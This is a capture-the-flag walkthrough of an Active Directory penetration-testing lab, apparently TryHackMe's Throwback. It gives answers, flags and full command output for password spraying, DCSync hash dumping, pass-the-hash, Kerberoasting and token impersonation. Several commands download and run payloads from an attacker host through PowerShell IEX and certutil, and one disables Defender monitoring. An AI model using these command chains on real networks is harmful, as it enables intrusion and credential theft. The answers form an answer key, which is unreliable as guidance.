
What is the user's cracked password?

keeperoftime

Task 28 - We gotta drop the load!

kali@kali:~/Documents/THM/Throwback$ proxychains ssh Timekeeper@10.200.179.176
Timekeeper@10.200.179.176's password: keeperoftime

timekeeper@THROWBACK-TIME C:\xampp\mysql\bin>mysql.exe -u root -p
Enter password: mysql337570 
MariaDB [(none)]> show databases; 
+--------------------+ 
| Database           |
+--------------------+
| domain_users       |
| information_schema |
| mysql              |
| performance_schema |
| pets               |
| phpmyadmin         |
| test               |
| timekeepusers      |
+--------------------+
MariaDB [(none)]> use domain_users; show tables; 
Database changed        
+------------------------+
| Tables_in_domain_users |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.000 sec)
MariaDB [domain_users]> select * from users; 
+----------------------+  
| name                 |
+----------------------+
| ClemonsD             |
| DunlopM              |
| LoganF               | 
| IbarraA              |               
| YatesZ               |                                                       
| CopelandS            |
| MckeeE               |  
| HeatonC              |  
| FlowersK             |  
| HardinA              |  
| BurrowsA             |  
| FinneganI            |
| GalindoI             |               
| LyonsC               |                                                       
| FullerS              |                                                         
| SteeleJ              |       
| WangG                |                                                       
| LoweryR              |                                                       
| JeffersD             |                                                       
| GreigH               |                                                       
| SharpK               |                                                       
| KruegerM             |                                                       
| ChenI                |
| VillanuevaD          |               
| BegumK               |                                                       
| TBH{ac3f61048236fd39 |                                                             
| 8da9e2289622157e}    |        
+----------------------+

What database are the timekeep login users located?

timekeepusers

What database are the domain users located in?

domain_users

What table was located in the domain users database?

users

What is the first username in the table?

ClemonsD

What is the root flag on THROWBACK-TIME?

Using the meterpreter's session we used for dumping the hashes.

meterpreter > cat C:\\Users\\Administrator\\Desktop\\root.txt
TBH{2898c692926188884bf508efe560588f}

What is the SQL flag on THROWBACK-TIME?

TBH{ac3f61048236fd398da9e2289622157e}

Task 29 - So we're doing this again...

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null crackmapexec smb 10.200.179.117 --continue-on-success -u users_db.txt -p weakPasswords.txt | grep \+
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK.local\JeffersD:Throwback2020 

What user was successfully password sprayed?

JeffersD

What was the password for the user?

Throwback2020

Task 30 - SYNCHRONIZE

Bloodhound DCSync
kali@kali:~/Documents/THM/Throwback$ proxychains ssh JeffersD@10.200.179.117
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:22  ...  OK
JeffersD@10.200.179.117's password:   Throwback2020
throwback\jeffersd@THROWBACK-DC01 C:\Users\jeffersd>type Documents\backup_notice.txt
As we backup the servers all staff are to use the backup account for replicating the servers
Don't use your domain admin accounts on the backup servers.

The credentials for the backup are:
TBH_Backup2348!

Best Regards,
Hans Mercer
Throwback Hacks Security System Administrator


kali@kali:~/Documents/THM/Throwback$ proxychains secretsdump.py -dc-ip 10.200.179.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.179.117
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e46b15fc5fb941c6ff32a752a6668d1:::
[...]
THROWBACK.local\MercerH:1206:aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea:::
[...]

What user has dcsync rights?

backup

What user can we dump credentials for and is an administrator?

Mercerh

Submit flags for THROWBACK-DC01 in Task 4.

kali@kali:~/Documents/THM/Throwback$ proxychains psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/Mercer
H"@10.200.179.117                                                               
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14  
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
                                                                               
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[*] Requesting shares on 10.200.179.117..... 
[*] Found writable share ADMIN$                                                
[*] Uploading file aqRjwPOM.exe                                                
[*] Opening SVCManager on 10.200.179.117.....
[*] Creating service Mrdy on 10.200.179.117.....  
[*] Starting service Mrdy.....
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[!] Press help for extra shell commands 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users

What is the user flag on THROWBACK-DC01?

C:\Users>type C:\Users\gongoh\Desktop\user.txt
TBH{e6119f456f5107d655be3682559f720f}

What is the root flag on THROWBACK-DC01?

C:\Users>type C:\Users\MercerH\Desktop\root.txt    
TBH{1b9b614a505017c6fa34cb188581db65}

What is the account description flag on THROWBACK-DC01?

C:\Users>powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/PowerView.ps1'); Get-NetUser | select samaccountname, description" 
[...]
samaccountname description                                              
-------------- -----------
MercerH        TBH{b89d9a1648b62a7f2ed01038ac47796b}

Task 31 - This forest has trust issues

hashcat -m 1000 -a 0 -r rules/OneRuleToRuleThemAll.rule hashes/mercerh_hash.txt /usr/share/wordlists/rockyou.txt
5edc955e8167199d1b7d0e656da0ceea:pikapikachu7

kali@kali:~/Documents/THM/Throwback$ proxychains scp /tmp/NotAShell.exe Mercerh@10.200.179.117:"C:/Windows/Temp/"
kali@kali:~/Documents/THM/Throwback$ proxychains ssh Mercerh@10.200.179.117 "C:/Windows/Temp/NotAShell.exe"

use multi/manage/autoroute
set session 15
set subnet 10.200.179.0
exploit
use auxiliary/server/socks_proxy
exploit

What domain has a trust relationship with THROWBACK.local?

corporate.local

What is the hostname of the machine that has a forest trust with the domain controller?

CORP-DC01

What is the Administrator account we can use to access the second forest?

mercerh

What is the name of the file in the Administrator's Documents folder?

server_update.txt

Submit flags for CORP-DC01 in Task 4

Run a cmd as root

What is the user flag on CORP-DC01?

C:\Windows\System32>type C:\Users\Mercerh\Desktop\user.txt
TBH{773e16d57284363e68a4db254860aed1}

What is the root flag on CORP-DC01?

C:\Windows\System32>type C:\Users\Administrator\Desktop\user.txt
TBH{d2368a76214103ac670a7984b4dba5a3}

Task 32 - r/badcode would like a word

Git Hub repository: Link

What User has a Github Account?

Rikka Foxx

What was the user found in github?

DaviesJ

What password was found in github?

Management2018

What machine can you access with the credentials?

kali@kali:~/Documents/THM/Throwback$ sudo proxychains xfreerdp /u:MercerH /p:'pikapikachu7' /v:10.200.179.118  

# Run a cmd as administrator
C:\Users\MercerH\Documents> powershell.exe -exec bypass -c "Set-MpPreference -DisableRealtimeMonitoring 1"
C:\Users\MercerH\Documents>certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
C:\Users\MercerH\Documents> .\NotAShell.exe

use multi/manage/autoroute
set session 21
set subnet 10.200.179.0
exploit
use auxiliary/server/socks_proxy
exploit

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null evil-winrm  -u DaviesJ -p Management2018 -i 10.200.179.243
*Evil-WinRM* PS C:\Users\daviesj\Documents> 

CORP-ADT01

What is the flag on GitHub?

https://github.com/RikkaFoxx

TBH{19fa56ead6f82d8c4abc664e2e56f0b1}

What is the flag on Twitter?

https://twitter.com/tbhSecurity/status/1292594165855981568

TBH{ca57861454b195f6a5c951a634e05f9e}

Task 33 - Identity Theft is not a Joke Jim

*Evil-WinRM* PS C:\Users\daviesj\Documents> certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\daviesj\Documents> .\NotAShell.exe

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
CORPORATE\DaviesJ
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2

Impersonation Tokens Available
========================================
CORPORATE\DosierK

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

meterpreter > cat C:\\USers\\dosierk\\Documents\\email_update.txt
Hey team! Hope you guys are having a good day!

As all of you probably already now we are transferring to our new email service as we
transition please use the new emails provided to you as well as the default credentials
that can be found within your emails.

Please do not use these emails outside of corporate as they contain sensitive information.

The new email format is based on what department you are in:

ESM-Example@TBHSecurity.com
FIN-Example@TBHSecurity.com
HRE-Example@TBHSecurity.com
ITS-Example@TBHSecurity.com
SEC-Example@TBHSecurity.com

In order to access your email you will need to go to mail.corporate.local as we get our 
servers moved over.

If you do not already have mail.corporate.local set in your hosts file please reach out to
IT to get that fixed.

Please remain patient as we make this transition and please feel free to email me with any
questions you may have regarding the new transition: HRE-KDoiser@TBHSecurity.com

Karen Dosier,
Human Relations Consulatant

What file is on the Administrator's Documents folder?

email_update.txt

Who wrote the email?

Karen Dosier

What is her official title in the company?

Human Relations Consulatant

Submit flags for CORP-ADT01 in Task 4

What is the user flag on CORP-ADT01?

meterpreter > cat C:\\USers\\DaviesJ\\Desktop\\user.txt
TBH{250fd11eadbd01e7ed14196611d7b255}

What is the root flag on CORP-ADT01?

meterpreter > cat C:\\USers\\dosierk\\Desktop\\root.txt
TBH{7defa0d5b36c72a48e5966fd2493e19e}

What is the flag on LinkedIn?

Link -> TBH{2913c22315f3ce3c873a14e4862dd717}

Task 35 - Lost and Found

You need to use foxy proxy with proxychains in order to get access to the web.

echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null ffuf -w new_emails.txt -u http://www.breachgtfo.local/search.php?search=FUZZ -fw 1265
test@email.com          [Status: 200, Size: 5046, Words: 1284, Lines: 224]
SEC-jstewart@TBHSecurity.com [Status: 200, Size: 5071, Words: 1284, Lines: 224]

Email: SEC-JStewart@TBHSecurity.com
Password: aqAwM53cW8AgRbfr
Username: JStewart
Data Breach: pwnDB

What is the Users email who has been affected by the Databreach?

SEC-JStewart@TBHSecurity.com

What was the Users password?

aqAwM53cW8AgRbfr

What credentials could be found in the Email?

TBSEC_GUEST:WelcomeTBSEC1!

Submit flags for reconnaissance in Task 4

What is the flag in the source code of Breach || GTFO?

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null curl "http://www.breachgtfo.local/search.php?search=SEC-jstewart@TBHSecurity.com" | grep TBH
<!--TBH{53f3a6cb77f633edd9749926b9a9217b}-->

TBH{53f3a6cb77f633edd9749926b9a9217b}

What is the flag on the Corporate Mail server?

Using the email address and the password at http://mail.corporate.local/mailbox.php we can get the flag.

TBH{19b6ca4281bbef3ee060aaf1c2eb4021}

Task 36 - Kerberoasting II Electric Boogaloo

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBSEC_GUEST /p:'WelcomeTBSEC1!' /v:10.200.179.79


C:\Users\TBSEC_GUEST>powershell -exec bypass "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat Hashcat"


TicketByteHexStream  :
Hash                 : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48064*$A54264EEFA8C95B5506BF936032C9D59$E7CB41FA7A4638D373EBEE1539C6B434A6BA1A0199A1F56A93E34F53BA8E50BDB43FB56C3967DDDAE5E0B759D2D22158C1D96F5D7610C0D7FECC7E0E92434449459D77FF7792B532093B7F65E4FA14EB43161EF9B140BA83A0A7951A666E6DCAB2408398F454C627016C5470B1198EAF1BB364F267BDE748FFB8389689CE9C3143A1DC274AD2CB1A624A09781BFB8039802FFB37CC4FD36C90D63476D244004C9DF074C6532777EB96037FA26603AA93201B73C9623418BA4DCE3B40384ECFE3EFB976E972E4DCDD4E4979637D56EE91A8844378A6A815B446598975A65DE5C7B1032ECE479A93BFFD595DFEDBA457F06CFCAF5BEB1CA6E9E44F733EB49A3A43CEF1A476B6744400985449259153CE867A345CD2912F3CCB6B163E1D4AEBAA58416404F34D29B0CAA6AF3274E65DAFEF6F01CCAE8D26E91AE34490A6823767D96B2345C83842ACC8049D94F2D9072B98A1ECF0A7CB92636581EEF1D2A22697B61ABAC7418E9902FDD7527C6206BB0B6EF8734CEBC7CE13E649CDD457A8166DB0BC59CE1C09C5F257FA2144E6E0C12898D0DF34DD9B63D4770E9753AB78985C249B3FFDE4DA6F0E8FF83B5813E212D191AD3139573533EF5BA7675CA20EBF396AC83B7DA801A59823C1400FA01F8BC9427F2EA42CE8B700833D673F67B08A51C119155621CC646A4B7F37233FB2D8E33791FF1FB0A7C2EAA8C2C464524DEA1CB648D5168E1E8023AF09A51B78228EA2285FFB9316D3986BC776CCB7798EE00BF5EAA8B04253775FBFCBD4ABA4F4D7FAD66459D735A4D9213DBEC620B0E574864F25CC37B44D9EF3A607ADC37E1ECDABCCEB72D61D1F5A8C98975479AF67D302D2CC860F1C8ABC7A76C371EC806906E06B355754AACADCBFBEBEB856A71BABBC2D18540E1D35400FA21D3BE9CDA234CF03CD6FC2F79415C15ABBA7F42FF76FCC3DBE05F93DF511001496A50EFCFC050E4676760C73CE84A9E4536C38FC38D0FCF0B076BE874B8E0146445899AFD4EBC96CCDCC6645273F62FF5857E97A83FE16D0B3E4C8165D10D3854541A60F4C29315D173B7F4473F06CA153478B50EC0AF91094D57612D5DEDEE23F325B661D392F8D9B92329AF410B3FE928C63B9A0305B7924BDF0CEFD6EB6CA090232A05C82C83EE39BDEAB7BA0AF813FC0A12CA7C05DF124A8F7405327EAC1CC148F92887F5C3F61787CE29EDF4C1EEC87FA0F8EA7FDC0CCEE6BD4DFACE4B46227D867B3510FA7EB36CECBB689EBDE68B2128D0724F7B38404A2F9CACE0F2CD906881AE2D28904AB02DDD457854E8DE1EBBDD6351A02D8F141460CF53D2D82B8BDB31E20E9066432B10D75B44C7769C7F1D22E93B1C01A4FC825835493230A5F6460C05C797B95629E7AD6EED41A1F0B2BA55ACA62071464E1D733A41FCC96B8C713EE306C75151E04252C673E4974D19A2A267295F41A2AF8A9FF9ECADF4DD59D38181E946A12C6E299F133600903BA85F4F6E1822F7CB62B283C615EE78689609423500C1E1FD04A02714A7B87CF8E36209D1804AC815F0C151F8293
SamAccountName       : TBService
DistinguishedName    : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local
ServicePrincipalName : TBSEC-DC01/TBService.TBSECURITY.local:48064

kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 tbservice_ticket.txt /usr/share/wordlists/rockyou.txt 
[...]:securityadmin284650

What User was vulnerable to Kerberoasting?

TBService

What password could be cracked from the Kerberos Ticket?

securityadmin284650

Submit flags for TBSEC-DC01 in Task 4

What is the user flag on TBSEC-DC01?

C:\Users>type C:\Users\daviesj\Desktop\user.txt
TBH{3efabe3366172f3f97d1123f2cc6dfb5}

What is the root flag on TBSEC-DC01?

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBService /p:'securityadmin284650!' /v:10.200.179.79
C:\Users>type C:\Users\Administrator\Desktop\root.txt
TBH{ec08be8aa9113b47f321b5032a27b220}